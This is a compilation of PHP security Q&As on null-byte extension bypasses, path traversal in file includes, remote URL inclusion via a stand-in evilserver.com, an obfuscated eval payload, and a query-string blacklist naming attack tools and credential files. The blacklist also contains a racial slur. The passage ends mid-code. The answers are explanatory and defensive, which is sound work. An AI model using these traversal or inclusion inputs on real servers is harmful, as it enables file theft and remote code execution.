Which special characters can cause a file path to be misinterpreted? - php

For example, suppose there is a function like this (pseudocode):
if ($_GET['path'] ENDS with .mp3 extension) { read($_GET['path']); }
Is it possible for an attacker to use some special symbol or method to get around the check, e.g.:
path=file.php^example.mp3
or
path=file.php+example.mp3
and so on?
In other words, does PHP have a symbol after which everything is ignored, so that PHP would try to open file.php?
P.S. DON'T POST ANSWERS about PROTECTION! I NEED TO KNOW IF THIS CODE can be bypassed, because I AM GOING TO REPORT MANY SCRIPTS for this issue (if it really is an issue).

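You ask whether PHP has a symbol after which everything is ignored, so that PHP would open file.php.
Yes, such a symbol exists; it is called the 'null byte' ("\0").
The PHP engine is written in C, where the end of a string is signalled by a null byte, so the underlying file functions stop reading the path at the first null byte they encounter. Note that this applies to older PHP versions: since PHP 5.3.4 the filesystem functions reject paths that contain a null byte, so the trick only works on servers that have not been updated.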
If you want the string to end with .mp3 you should manually append it.
Having said that, it is, generally speaking, a very bad idea to accept a user supplied path from a security standpoint (and I believe you are interested in the security aspect of this, because you originally posted this question on security.SE).
Consider the situation where:
$_GET['path'] = "../../../../../etc/passwd\0";
or a variation on this theme.
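To make the check concrete, here is a minimal sketch of an extension test that also refuses null bytes. The function name hasMp3Extension and the sample inputs are illustrative assumptions, not code from the question.

```php
<?php
// Hypothetical helper (not from the question): true only when the path
// contains no null byte and ends with ".mp3".
function hasMp3Extension(string $path): bool
{
    // A null byte is never legitimate in a file name, so refuse it outright
    // instead of relying on the PHP version to reject it later.
    if (strpos($path, "\0") !== false) {
        return false;
    }
    // Case-insensitive suffix check; substr() keeps this usable before PHP 8.
    return strtolower(substr($path, -4)) === '.mp3';
}

var_dump(hasMp3Extension("file.php\0example.mp3")); // bool(false)
var_dump(hasMp3Extension("song.mp3"));               // bool(true)
```

Passing this test does not make a path safe on its own: a value such as ../../secret.mp3 still ends with .mp3.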

The leading concept in programming is "Don't trust user input". So the main problem in your case is not a special character; it's how you work with your data. You shouldn't use a path given by a user, because the user can manipulate the path or other variables.
To escape user input for output you can use htmlspecialchars, or you can filter your GET input with filter_input, something like this (keep in mind that both only neutralise HTML special characters; they do not stop path tricks such as ../):
$search_html = filter_input(INPUT_GET, 'search', FILTER_SANITIZE_SPECIAL_CHARS);

WE CAN'T TELL YOU IF THE CODE CAN BE "BYPASSED" BECAUSE YOU'VE NOT GIVEN US ANY PHP CODE
As to the question of whether it's possible to trick PHP into processing a file it shouldn't, based on the end of the string: only if there is another file somewhere else which has the same ending. However, by default (allow_url_fopen is enabled out of the box), PHP will happily read from URLs using the same functions it uses for local files. Consider:
http://yourserver.com/yourscript.php?path=http%3A%2F%2Fevilserver.com%2Fpwnd_php.txt%3Ffake_end%3Dmp3
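The following sketch decodes the path parameter from that URL to show why a naive suffix test accepts it. It only inspects the string; nothing is fetched. The variable names are illustrative.

```php
<?php
// The query-string value from the example URL, still percent-encoded.
$encoded = 'http%3A%2F%2Fevilserver.com%2Fpwnd_php.txt%3Ffake_end%3Dmp3';

// PHP decodes $_GET values automatically; rawurldecode() mimics that here.
$path = rawurldecode($encoded);
echo $path, "\n"; // http://evilserver.com/pwnd_php.txt?fake_end=mp3

// A naive "ends with mp3" test is satisfied by the fake query parameter...
var_dump(substr($path, -3) === 'mp3'); // bool(true)

// ...while the scheme shows that this is a remote URL, not a local file.
var_dump(parse_url($path, PHP_URL_SCHEME)); // string(4) "http"
```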

how to decode php base64_decode

I'm a newbie who is starting to learn from source code. I bought a script on the internet that was supposed to come with full source code, but it turns out that part of it is hidden. How do I decrypt/decode lines like this:
<?php
$keystroke1 = base64_decode("d2RyMTU5c3E0YXllejd4Y2duZl90djhubHVrNmpoYmlvMzJtcA==");
eval(gzinflate(base64_decode('hY5NCsIwEIWv8ixdZDCKWZcuPUfRdqrBmsBkAkrp3aVIi3Tj9v1+vje7PodWfQwNv3zSZAqJyqGNHRdE4+JiVU2ZVHy42fLyjDkoYUT54DdqpHxNKmsAJwtHFXxvksrAYXGort1cE9YsAe1dTJTOzCuEPZbhChN4SPw/iePMd/7ybSmcxeb+4Mj+vkzTBw==')));
$O0O0O0O0O0O0=$keystroke1[2].$keystroke1[32].$keystroke1[20].$keystroke1[11].$keystroke1[23].$keystroke1[15].$keystroke1[32].$keystroke1[1].$keystroke1[11];
$keystroke2 = $O0O0O0O0O0O0("xes26:tr5bzf{8ydhog`uw9omvl7kicjp43nq", -1);
$OO000OO000OO=$keystroke2[16].$keystroke2[12].$keystroke2[31].$keystroke2[23].$keystroke2[18].$keystroke2[24].$keystroke2[9].$keystroke2[20].$keystroke2[11];
$O0000000000O=$keystroke1[30].$keystroke1[9].$keystroke1[6].$keystroke1[11].$keystroke1[27].$keystroke1[8].$keystroke1[19].$keystroke1[1].$keystroke1[11].$keystroke1[15].$keystroke1[32].$keystroke1[1].$keystroke1[11];
eval($OO000OO000OO(base64_decode('LcTLsm
tKAADQn7lVZ+8yoBtB3ZH3OyEEMbnl0SLxTJrQvv
5M7hos9C36n38uF4Zh/u+nLDA6cf/VqJpq9PPHq2
IHD+dQlrVwpIa3BPicV2atbjLVsx+to7il1297dn
c+9PeDJGOoGn0MJUJnSqiJwrGcK5/bG2iiJtUoOk
3GKbHYjjzd5yLu3q2dPpWSFjDVTKWSS6MFsF6MU5
dsbJn7qHRxhGo0MNuluk29F3iwyAx/cYO+OfPWi1
ECDkWG1NsMLuAcM3F98vtMsubbvQjf1ZpVMUP5Eh
puFNzCi/CYkoM1VgsAetzjpvEe1M2AlX4YFjQZF0
A0VBRQKS0B5mcI7na2N/nER993+qocgmh9WawUrU
YhBMUiPNpuXNQy2o7VxHvhyO3nZkcWTmQu5kV1C2
ECbZiH8XsL4QuYbf7lI4SF1gDM/vVqRz4qyj7a8b
qS1nXP79731t4O0qcDaqN97BHDzlPwTEF6H7p9a3
Zu1Ut6X5GNTgZhWe3dHa+6yzJ58MX1Pc8mwAWK4v
EVLjGolQQLieOvkn4jD4d0FMQuLYvXhaxbzJyLR2
OHDKhMu2EwHthDt+I7YwOvVUydwEnCigk/n4iQei
SzwWNKicdunzmrVoOWl9gt8lhK+WzNpbPqkHEK7i
xBHT84UAbkHpity8i9eLUUulASI5d7cfpGWF6I4l
7tYBeJmYzXycA3FbbrSb+yNgd8XM5u7wU0mL8tVP
hJ2J/nu2QLr/OgzZrmp7xvKmpZCgHU7w0RlS1PT9
4JvxXtekif9dDGvBxSQjcwj2i32C7Abbcosvey5I
iq2hW7mjn/lUS6OUQ64Kw/v7+///4F')));
?>
Is code like this dangerous?
You are looking at a piece of obfuscated code. I will explain it line by line, but first let's go over the functions that are used:
base64_decode()
This function decodes a base64 encoded string. It's used here to unscramble intentionally scrambled code.
gzinflate()
This function decompresses a compressed string. It's used the same way as base64_decode().
eval()
This function executes a string as code. Its use is discouraged and is in itself a bit of a red flag, though it has legitimate uses.
$keystroke1 = base64_decode("d2RyMTU5c3E0YXllejd4Y2duZl90djhubHVrNmpoYmlvMzJtcA==");
This line creates an apparently random string of characters: wdr159sq4ayez7xcgnf_tv8nluk6jhbio32mp
This string is saved to a variable, $keystroke1. The string itself is not important, other than that it contains some letters that are used later.
eval(gzinflate(base64_decode('hY5NCsIwEIWv8ixdZDCKWZcuPUfRdqrBmsBkAkrp3aVIi3Tj9v1+vje7PodWfQwNv3zSZAqJyqGNHRdE4+JiVU2ZVHy42fLyjDkoYUT54DdqpHxNKmsAJwtHFXxvksrAYXGort1cE9YsAe1dTJTOzCuEPZbhChN4SPw/iePMd/7ybSmcxeb+4Mj+vkzTBw==')));
This line unscrambles a doubly scrambled string and then runs this resulting code:
if(!function_exists("rotencode")){function rotencode($string,$amount) { $key = substr($string, 0, 1); if(strlen($string)==1) { return chr(ord($key) + $amount); } else { return chr(ord($key) + $amount) . rotEncode(substr($string, 1, strlen($string)-1), $amount); }}}
This creates a new function called rotencode(), which is yet another way of unscrambling strings.
$O0O0O0O0O0O0=$keystroke1[2].$keystroke1[32].$keystroke1[20].$keystroke1[11].$keystroke1[23].$keystroke1[15].$keystroke1[32].$keystroke1[1].$keystroke1[11];
This line takes specific characters from that random string from earlier to create the word "rotencode" as a string, stored in the variable named $O0O0O0O0O0O0.
$keystroke2 = $O0O0O0O0O0O0("xes26:tr5bzf{8ydhog`uw9omvl7kicjp43nq", -1);
This line uses the rotencode() function to unscramble yet another string (actually exactly the same string as before, for some reason).
$OO000OO000OO=$keystroke2[16].$keystroke2[12].$keystroke2[31].$keystroke2[23].$keystroke2[18].$keystroke2[24].$keystroke2[9].$keystroke2[20].$keystroke2[11];
$O0000000000O=$keystroke1[30].$keystroke1[9].$keystroke1[6].$keystroke1[11].$keystroke1[27].$keystroke1[8].$keystroke1[19].$keystroke1[1].$keystroke1[11].$keystroke1[15].$keystroke1[32].$keystroke1[1].$keystroke1[11];
On these lines the two (identical but separate) random strings are used to create the words gzinflate and base64_decode. This is done so the coder can use these functions without it being apparent that that's what is happening. However, base64_decode() is never used this way in the snippet you posted. That might suggest that it is used later in the code in places you haven't seen or recognized yet. Searching your code for "$O0000000000O" might yield other uses.
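The name-building steps can be reproduced without eval. The sketch below rewrites the character shift as a loop and assembles the three function names from the same offsets; shiftChars() and pick() are illustrative names that do not appear in the obfuscated file.

```php
<?php
// Same shift as the recursive rotencode(), written as a loop.
function shiftChars(string $text, int $amount): string
{
    $out = '';
    for ($i = 0, $n = strlen($text); $i < $n; $i++) {
        $out .= chr(ord($text[$i]) + $amount);
    }
    return $out;
}

// Concatenate the characters found at the given offsets.
function pick(string $alphabet, array $offsets): string
{
    $word = '';
    foreach ($offsets as $offset) {
        $word .= $alphabet[$offset];
    }
    return $word;
}

$keystroke1 = base64_decode('d2RyMTU5c3E0YXllejd4Y2duZl90djhubHVrNmpoYmlvMzJtcA==');
$keystroke2 = shiftChars('xes26:tr5bzf{8ydhog`uw9omvl7kicjp43nq', -1);

var_dump($keystroke1 === $keystroke2);                                         // bool(true)
echo pick($keystroke1, [2, 32, 20, 11, 23, 15, 32, 1, 11]), "\n";              // rotencode
echo pick($keystroke2, [16, 12, 31, 23, 18, 24, 9, 20, 11]), "\n";             // gzinflate
echo pick($keystroke1, [30, 9, 6, 11, 27, 8, 19, 1, 11, 15, 32, 1, 11]), "\n"; // base64_decode
```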
eval($OO000OO000OO(base64_decode('LcTLsmtKAADQn7lVZ+8yoBtB3ZH3OyEEMbnl0SLxTJrQvv5M7hos9C36n38uF4Zh/u+nLDA6cf/VqJpq9PPHq2IHD+dQlrVwpIa3BPicV2atbjLVsx+to7il1297dnc+9PeDJGOoGn0MJUJnSqiJwrGcK5/bG2iiJtUoOk3GKbHYjjzd5yLu3q2dPpWSFjDVTKWSS6MFsF6MU5dsbJn7qHRxhGo0MNuluk29F3iwyAx/cYO+OfPWi1ECDkWG1NsMLuAcM3F98vtMsubbvQjf1ZpVMUP5EhpuFNzCi/CYkoM1VgsAetzjpvEe1M2AlX4YFjQZF0A0VBRQKS0B5mcI7na2N/nER993+qocgmh9WawUrUYhBMUiPNpuXNQy2o7VxHvhyO3nZkcWTmQu5kV1C2ECbZiH8XsL4QuYbf7lI4SF1gDM/vVqRz4qyj7a8bqS1nXP79731t4O0qcDaqN97BHDzlPwTEF6H7p9a3Zu1Ut6X5GNTgZhWe3dHa+6yzJ58MX1Pc8mwAWK4vEVLjGolQQLieOvkn4jD4d0FMQuLYvXhaxbzJyLR2OHDKhMu2EwHthDt+I7YwOvVUydwEnCigk/n4iQeiSzwWNKicdunzmrVoOWl9gt8lhK+WzNpbPqkHEK7ixBHT84UAbkHpity8i9eLUUulASI5d7cfpGWF6I4l7tYBeJmYzXycA3FbbrSb+yNgd8XM5u7wU0mL8tVPhJ2J/nu2QLr/OgzZrmp7xvKmpZCgHU7w0RlS1PT94JvxXtekif9dDGvBxSQjcwj2i32C7Abbcosvey5Iiq2hW7mjn/lUS6OUQ64Kw/v7+///4F')));
This is where it all comes together. This line unscrambles a line of code which has been compressed and encoded 10 times over. The final result is this:
$cnk = array('localhost');
That's it. It sets the string "localhost" as the sole element of an array and saves it in a variable named $cnk.
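If you want to inspect a payload like this yourself, a common approach is to decode it the same way but print the result instead of passing it to eval. The sketch below builds its own stand-in payload rather than reusing the blob from your file, and it assumes the zlib extension is available; the variable names are illustrative.

```php
<?php
// Build a stand-in payload the same way an obfuscator would.
$hiddenCode = "\$cnk = array('localhost');";
$payload = base64_encode(gzdeflate($hiddenCode));

// Obfuscated pattern:  eval(gzinflate(base64_decode($payload)));
// Inspection pattern:  decode the same way, but print instead of executing.
$decoded = gzinflate(base64_decode($payload));
echo $decoded, "\n"; // $cnk = array('localhost');
```

When the printed text is itself another eval(...) wrapper, repeat the same step on the inner string until plain code appears.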
In and of itself, there's nothing hazardous about running this code, but noting the lengths that the coder went to in order to hide this line, it's probably a safe bet that it wasn't placed there to help you - the buyer - in any way. Search your code for the $cnk variable if you want to know exactly what's being done. Or better yet, chalk this experience up as a loss and find a better way to learn coding. There are plenty of books, video tutorials and free resources online. Do not place your trust in whoever sold you this code. While they may not have been malicious (people suggested in comments that this might be part of a license check), anyone who includes something like this in their code is not someone you should be learning from.
Good luck on your coding journey!

function to provide some extra security in php with query_string

Some years ago I started including the following code at the top of my pages. I read that it was good practice and used it, but now I'm wondering: is it actually helpful?
$page = "index.php";
$cracktrack = $_SERVER['QUERY_STRING'];
$wormprotector = array('chr(', 'chr=', 'chr%20', '%20chr', 'wget%20', '%20wget', 'wget(',
'cmd=', '%20cmd', 'cmd%20', 'rush=', '%20rush', 'rush%20',
'union%20', '%20union', 'union(', 'union=', 'echr(', '%20echr', 'echr%20', 'echr=',
'esystem(', 'esystem%20', 'cp%20', '%20cp', 'cp(', 'mdir%20', '%20mdir', 'mdir(',
'mcd%20', 'mrd%20', 'rm%20', '%20mcd', '%20mrd', '%20rm',
'mcd(', 'mrd(', 'rm(', 'mcd=', 'mrd=', 'mv%20', 'rmdir%20', 'mv(', 'rmdir(',
'chmod(', 'chmod%20', '%20chmod', 'chmod(', 'chmod=', 'chown%20', 'chgrp%20', 'chown(', 'chgrp(',
'locate%20', 'grep%20', 'locate(', 'grep(', 'diff%20', 'kill%20', 'kill(', 'killall',
'passwd%20', '%20passwd', 'passwd(', 'telnet%20', 'vi(', 'vi%20',
'insert%20into', 'select%20', 'nigga(', '%20nigga', 'nigga%20', 'fopen', 'fwrite', '%20like', 'like%20',
'$_request', '$_get', '$request', '$get', '.system', 'HTTP_PHP', '&aim', '%20getenv', 'getenv%20',
'new_password', '&icq','/etc/password','/etc/shadow', '/etc/groups', '/etc/gshadow',
'HTTP_USER_AGENT', 'HTTP_HOST', '/bin/ps', 'wget%20', 'unamex20-a', '/usr/bin/id',
'/bin/echo', '/bin/kill', '/bin/', '/chgrp', '/chown', '/usr/bin', 'g++', 'bin/python',
'bin/tclsh', 'bin/nasm', 'perl%20', 'traceroute%20', 'ping%20', '.pl', '/usr/X11R6/bin/xterm', 'lsof%20',
'/bin/mail', '.conf', 'motd%20', 'HTTP/1.', '.inc.php', 'config.php', 'cgi-', '.eml',
'file://', 'window.open', '<SCRIPT>', 'javascript://','img src', 'img%20src','.jsp','ftp.exe',
'xp_enumdsn', 'xp_availablemedia', 'xp_filelist', 'xp_cmdshell', 'nc.exe', '.htpasswd',
'servlet', '/etc/passwd', 'wwwacl', '~root', '~ftp', '.js', '.jsp', 'admin_', '.history',
'bash_history', '.bash_history', '~nobody', 'server-info', 'server-status', 'reboot%20', 'halt%20',
'powerdown%20', '/home/ftp', '/home/www', 'secure_site, ok', 'chunked', 'org.apache', '/servlet/con',
'<script', '/robot.txt' ,'/perl' ,'mod_gzip_status', 'db_mysql.inc', '.inc', 'select%20from',
'select from', 'drop%20', '.system', 'getenv', 'http_', '_php', 'php_', 'phpinfo()', '<?php', '?>', 'sql=');
$checkworm = str_replace($wormprotector, '*', $cracktrack);
if ($cracktrack != $checkworm){
$cremotead = $_SERVER['REMOTE_ADDR'];
$cuseragent = $_SERVER['HTTP_USER_AGENT'];
header("location:$page");
die();
}
In general, I personally wouldn't use this strategy. I'd rather sanitize each and every input. If a user passes .bash_history in the URL I don't care because it's never going to do anything in my script.
I could maybe see something like this being useful if you had some third-party low reliability script that was available for anyone to hit. Even in that scenario though it seems like a semi-reliable band-aid at best.
For applications you write however, this should hopefully be unnecessary.
Although it's great that you're concerned about security, and you're following the principle of treating all input with suspicion, I don't think that list is terribly useful.
It's a rather arbitrary selection of potentially unwanted strings/commands/tags/folder names and other things. It's likely to get out of date over time, and probably is already. Having a generic list like this is never going to catch everything, and may also lend a false sense of security that your application is secure when really it's not.
As another answer has already mentioned, you want to be checking each input you get from your application (whether via query string variables, POST variables or wherever) and validating that it meets your expectations (e.g. if you're expecting a numeric value, is the value passed in numeric?).
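As a small illustration of that kind of per-input validation, here is a sketch that accepts a value only if it is a positive integer. The function name parsePositiveInt and the sample values are assumptions made for the example.

```php
<?php
// Hypothetical validator for a parameter that must be a positive integer.
function parsePositiveInt($raw): ?int
{
    $value = filter_var($raw, FILTER_VALIDATE_INT, ['options' => ['min_range' => 1]]);
    // filter_var() returns false when the input is not a valid integer in range.
    return $value === false ? null : $value;
}

var_dump(parsePositiveInt('42'));             // int(42)
var_dump(parsePositiveInt('42; DROP TABLE')); // NULL
var_dump(parsePositiveInt('-3'));             // NULL
```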
Then if you plan to redisplay or re-use that data, you might want to sanitise it further, and strip out things that might potentially be dangerous in the context where it will be used. For example, you might strip out "script" tags if you're going to display the data on a web page.
If you sanitize all user input properly, there's absolutely no need to use a script like this.
Besides that, it's also case-sensitive (str_replace vs str_ireplace), which means that I can easily bypass it by mixing uppercase and lowercase letters. It also only checks the query string, so it's useless against POST requests.
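The case problem is easy to demonstrate. This sketch uses two entries from the question's list and a made-up query string in upper case:

```php
<?php
// Two entries taken from the blacklist in the question.
$blacklist = ['union%20', 'select%20'];

// Hypothetical attack string that simply uses upper case.
$query = 'id=1%20UNION%20SELECT%20password';

// Case-sensitive replacement changes nothing, so the filter sees no problem.
var_dump(str_replace($blacklist, '*', $query) === $query);  // bool(true)

// The case-insensitive variant does notice it.
var_dump(str_ireplace($blacklist, '*', $query) === $query); // bool(false)
```

Switching to str_ireplace closes this particular hole only; the other objections to a generic blacklist still apply.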

PHP - alternative to Base64 with shorter results?

I'm currently using base64 to encode a short string and decode it later, and wonder if a better (shorter) alternative is possible.
$string = '/path/to/img/image.jpg';
$convertedString = base64_encode($string);
// New session, new user
$convertedString = 'L3BhdGgvdG8vaW1nL2ltYWdlLmpwZw==';
$originalString = base64_decode('L3BhdGgvdG8vaW1nL2ltYWdlLmpwZw==');
// Can $convertedString be shorter by any means ?
Requirements :
Shorter result possible
Must be reversible any time in a different session (therefore unique)
No security needed (anyone can guess it)
Any kind of characters that can be used in a URL (except slashes)
Can be an external lib
Goal :
Get a clean unique id from a path file that is not the path file and can be used in a URL, without using a database.
I've searched and read a lot, looks like it doesn't exist but couldn't find a definitive answer.
Well since you're using these in a URL, why not use rawurlencode($string) and rawurldecode($encodedString)?
If you can reserve one character like - (i.e., ensure that - never appears in your file names), you can do even better by doing rawurlencode(str_replace('/', '-', $string)) and str_replace('-', '/', rawurldecode($encodedString)). Depending on the file names you pick, this will create IDs that are the same length as the original filename. (This won't work if your file names have multi-byte characters in them; you will need to use some mb_* functions for that case.)
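A minimal sketch of that idea, assuming "-" really never occurs in a file name. The helper names pathToId and idToPath are made up for the example.

```php
<?php
// Hypothetical helpers; they assume "-" never occurs in a real file name.
function pathToId(string $path): string
{
    return rawurlencode(str_replace('/', '-', $path));
}

function idToPath(string $id): string
{
    return str_replace('-', '/', rawurldecode($id));
}

$id = pathToId('/path/to/img/image.jpg');
echo $id, "\n";           // -path-to-img-image.jpg
echo idToPath($id), "\n"; // /path/to/img/image.jpg
```

For this sample path the ID has the same 22 characters as the input, compared with 32 for the base64 version in the question.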
You could try using compression functions, but for strings as short as file paths, compression usually makes the output larger than the input.
Ultimately, unless you are willing to use a database, disallow certain file names, or you know something about what kinds of file names will come up, the best you can hope for is IDs that are as short or almost as short as the original file names. Otherwise, this would be a universal compression function, which is impossible.
I don't think there is anything reliable out there that would significantly shorten the encoded string and keep it URL friendly.
e.g. if you use something like
$test = gzcompress(base64_encode($parameter), 9, ZLIB_ENCODING_DEFLATE);
echo $test;
it would generate characters that are not URL-friendly and any post-transformation would be just a risky mess.
However, you can easily transform text to get URL-friendly parameters.
I use the following code to generate URL-friendly parameters:
$encodedParameter = urlencode(base64_encode($parameter));
And the following code to decode it:
$parameter = base64_decode(urldecode($encodedParameter));
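A related variant, which is not what the code above does, is the "base64url" alphabet: swap + and / for - and _ and drop the = padding, so nothing needs percent-encoding and no slash can appear. The sketch below is one way to write it; the function names are assumptions.

```php
<?php
// URL-safe base64: "+" and "/" become "-" and "_", padding is removed.
function base64UrlEncode(string $data): string
{
    return rtrim(strtr(base64_encode($data), '+/', '-_'), '=');
}

function base64UrlDecode(string $id): string
{
    // Restore the "=" padding to a multiple of four before decoding.
    $padded = str_pad($id, strlen($id) + (4 - strlen($id) % 4) % 4, '=');
    return base64_decode(strtr($padded, '-_', '+/'));
}

$id = base64UrlEncode('/path/to/img/image.jpg');
echo $id, "\n";                  // L3BhdGgvdG8vaW1nL2ltYWdlLmpwZw
echo base64UrlDecode($id), "\n"; // /path/to/img/image.jpg
```

This saves at most two characters of padding, plus whatever urlencode would have added for +, / and =; the result is still longer than the original string.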
As an alternative solution, you could use generated tokens to map known files using some database.

is_file($_GET) and security

I'm using this code on top of my PHP file for loading cached files and I'm worried whether it's secure enough:
//quick! load from cache if exists!
if (is_file('cache/'.($cachefile=basename($_GET['f']))))
{
header('content-type: text/css');
require('cache/'.$cachefile);
die(); //ALL OK, loaded from cache
}
EDIT: If it isn't, I would also like to know how it is exploitable and how to rewrite it in a safe manner.
EDIT 2: I edited the code. I don't know how I could have thought that is_file would filter out bad paths >.<
EDIT 3: Changed it again so that it uses basename() instead of end(explode()), and so that the file name is assigned to a variable during the first check (the is_file call) instead of repeating the expression.
I never just include($_GET), but today I somehow thought is_file would filter out paths that might harm my system. I don't know why.
Thank you
I could send $_GET['f'] = '../../database_passwords.xml' ...
Use basename to eliminate anything but the last segment of the passed path. Alternatively, construct the path, then compute the absolute path that corresponds and check if it's still within cache/.
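The second option (resolve the absolute path, then check that it is still inside cache/) could look roughly like this. It is a sketch under assumptions: resolveInside is a made-up name, and the demo uses a throwaway directory instead of your real cache folder.

```php
<?php
// Hypothetical helper: returns the real path of $name inside $baseDir,
// or null when the file is missing or resolves outside that directory.
function resolveInside(string $baseDir, string $name): ?string
{
    $base = realpath($baseDir);
    if ($base === false || strpos($name, "\0") !== false) {
        return null;
    }
    // realpath() collapses "../" segments and symlinks; false if not found.
    $candidate = realpath($base . DIRECTORY_SEPARATOR . $name);
    if ($candidate === false || !is_file($candidate)) {
        return null;
    }
    // Accept only paths that still start with "<base>/".
    $prefix = $base . DIRECTORY_SEPARATOR;
    return strncmp($candidate, $prefix, strlen($prefix)) === 0 ? $candidate : null;
}

// Demo in a throwaway directory (directory and file names are made up).
$cacheDir = sys_get_temp_dir() . DIRECTORY_SEPARATOR . 'cache_demo_' . uniqid();
mkdir($cacheDir);
file_put_contents($cacheDir . DIRECTORY_SEPARATOR . 'style.css', 'body{}');

var_dump(resolveInside($cacheDir, 'style.css') !== null);     // bool(true)
var_dump(resolveInside($cacheDir, '../../../../etc/passwd')); // NULL
```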
BAD!
What about:
page.php?f=../../../../../etc/passwd
Never do such things.
Check f against a whitelist or a specific pattern like "^[a-z]+\.php$".
No it isn't. I could put '../../anypath' in $_GET['f'] and gain access to any file on your server, even those outside your www root.
[edit]
It would be a lot safer if you would check for '/' and other invalid characters in the value. It is pretty safe if that filename only contains alphanumeric characters and . and _.
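One way to express such a character check is a regular expression. The sketch below is slightly stricter than "alphanumerics, . and _" because it also refuses a leading dot and "..", which is an extra assumption on my part; the function name is made up.

```php
<?php
// Hypothetical whitelist check for a cache file name.
function isSafeCacheName(string $name): bool
{
    // One or more alphanumeric/underscore chunks separated by single dots:
    // no slashes, no leading dot, no "..".
    return preg_match('/\A[A-Za-z0-9_]+(?:\.[A-Za-z0-9_]+)*\z/', $name) === 1;
}

var_dump(isSafeCacheName('style.min.css')); // bool(true)
var_dump(isSafeCacheName('../secret'));     // bool(false)
var_dump(isSafeCacheName('..'));            // bool(false)
```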

Images not uploading when htmlentities has 'UTF-8' set

I have a form that, among other things, accepts an image for upload and sticks it in the database. Previously I had a function filtering the POSTed data that was basically:
function processInput($stuff) {
$formdata = $stuff;
$formdata = htmlentities($formdata, ENT_QUOTES);
return "'" . mysql_real_escape_string(stripslashes($formdata)) . "'";
}
In an effort to fix some weird entities that weren't getting converted properly, I changed the function to the following (the only change is the added 'UTF-8' argument in htmlentities):
function processInput($stuff) {
$formdata = $stuff;
$formdata = htmlentities($formdata, ENT_QUOTES, 'UTF-8'); //added UTF-8
return "'" . mysql_real_escape_string(stripslashes($formdata)) . "'";
}
And now images will not upload.
What would be causing this? Simply removing the 'UTF-8' bit allows images to upload properly but then some of the MS Word entities that users put into the system show up as gibberish. What is going on?
EDIT: Since I cannot do much to change the code on this beast I was able to slap a bandaid on by using htmlspecialchars() rather than htmlentities() and that seems to at least leave the image data untouched while converting things like quotes, angle brackets, etc.
bobince's advice is excellent but in this case I cannot now spend the time needed to fix the messy legacy code in this project. Most stuff I deal with is object oriented and framework based but now I see first hand what people mean when they talk about "spaghetti code" in PHP.
function processInput($stuff) {
$formdata = $stuff;
$formdata = htmlentities($formdata, ENT_QUOTES);
return "'" . mysql_real_escape_string(stripslashes($formdata)) . "'";
}
This function represents a basic misunderstanding of string processing, one common to PHP programmers.
SQL-escaping, HTML-escaping and input validation are three separate functions, to be used at different stages of your script. It makes no sense to try to do them all in one go; it will only result in characters that are ‘special’ to any one of the processes getting mangled when used in the other parts of the script. You can try to tinker with this function to try to fix mangling in one part of the app, but you'll break something else.
Why are images being mangled? Well, it's not immediately clear via what path image data is going from a $_FILES temporary upload file to the database. If this function is involved at any point though, it's going to completely ruin the binary content of an image file. Backslashes removed and HTML-escaped... no image could survive that.
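One plausible explanation for the specific 'UTF-8' symptom, offered as an assumption since the upload path is not shown: when htmlentities is told the input is UTF-8 and meets bytes that are not valid UTF-8, it returns an empty string unless ENT_SUBSTITUTE or ENT_IGNORE is set. Binary image data is almost never valid UTF-8. Before PHP 5.4 the default charset was ISO-8859-1, which accepts any byte. A quick way to see the difference:

```php
<?php
// First bytes of a typical JPEG file; they are not valid UTF-8.
$binary = "\xFF\xD8\xFF\xE0";

// With an explicit UTF-8 charset and no ENT_SUBSTITUTE/ENT_IGNORE flag,
// invalid byte sequences make htmlentities() return an empty string.
var_dump(htmlentities($binary, ENT_QUOTES, 'UTF-8'));             // string(0) ""

// A single-byte charset accepts every byte, so something comes back
// (still altered, which is a problem of its own for binary data).
var_dump(htmlentities($binary, ENT_QUOTES, 'ISO-8859-1') !== ''); // bool(true)
```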
mysql_real_escape_string is for escaping some text for inclusion in a MySQL string literal. It should be used always-and-only when making an SQL string literal with inserted text, and not globally applied to input, because some of the values that arrive in the input aren't going immediately or solely to the database. For example, if you echo one of the input values to the HTML page, you'll find you get a bunch of unwanted backslashes in it when it contains characters like '. This is how you end up with pages full of runaway backslashes.
(Even then, parameterised queries are generally preferable to manual string hacking and mysql_real_escape_string. They hide the details of string escaping from you so you don't get confused by them.)
htmlentities is for escaping text for inclusion in an HTML page. It should be used always-and-only in the output templating bit of your PHP. It is inappropriate to run it globally over all your input because not everything is going to end up in an HTML page or solely in an HTML page, and most probably it's going to go to the database first where you absolutely don't want a load of &lt; and &amp; rubbish making your text fail to search or substring reliably.
(Even then, htmlspecialchars is generally preferable to htmlentities as it only encodes the characters that really need it. htmlentities will add needless escaping, and unless you tell it the right encoding it'll also totally mess up all your non-ASCII characters. htmlentities should almost never be used.)
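The difference between the two functions shows up on any string with a non-ASCII character. A short sketch with a made-up sample value:

```php
<?php
$name = "Zo\u{e9} <b>O'Neil</b>"; // "\u{e9}" is é; this syntax needs PHP 7+

// Only the characters that are special in HTML are replaced.
echo htmlspecialchars($name, ENT_QUOTES, 'UTF-8'), "\n";
// Zoé &lt;b&gt;O&#039;Neil&lt;/b&gt;

// Every character with a named entity is replaced, including é.
echo htmlentities($name, ENT_QUOTES, 'UTF-8'), "\n";
// Zo&eacute; &lt;b&gt;O&#039;Neil&lt;/b&gt;
```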
As for stripslashes... well, you sometimes need to apply that to input, but only when the idiotic magic_quotes_gpc option is turned on. You certainly shouldn't apply it all the time, only when you detect magic_quotes_gpc is on. It is long deprecated and thankfully dying out, so it's probably just as good to bomb out with an error message if you detect it being turned on. Then you could chuck the whole processInput thing away.
To summarise:
At start time, do no global input processing. You can do application-specific validation here if you want, like checking a phone number is just numbers, or removing control characters from text or something, but there should be no escaping happening here.
When making an SQL query with a string literal in it, use SQL-escaping on the value as it goes into the string: $query= "SELECT * FROM t WHERE name='".mysql_real_escape_string($name)."'";. You can define a function with a shorter name to do the escaping to save some typing. Or, more readably, parameterisation.
When making HTML output with strings from the input or the database or elsewhere, use HTML-escaping, eg.: <p>Hello, <?php echo htmlspecialchars($name); ?>!</p>. Again, you can define a function with a short name to do echo htmlspecialchars to save on typing.
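Put together, the three stages might look like the sketch below. It uses PDO with a parameterised query instead of mysql_real_escape_string (the old mysql_* extension was removed in PHP 7.0). To stay self-contained it assumes the pdo_sqlite extension and an in-memory SQLite database standing in for MySQL; the table, column and variable names are made up.

```php
<?php
// In-memory SQLite stands in for the real database server (assumption).
$pdo = new PDO('sqlite::memory:');
$pdo->setAttribute(PDO::ATTR_ERRMODE, PDO::ERRMODE_EXCEPTION);
$pdo->exec('CREATE TABLE t (name TEXT)');

$name = "Robert'); DROP TABLE t;--"; // raw input, no global escaping applied

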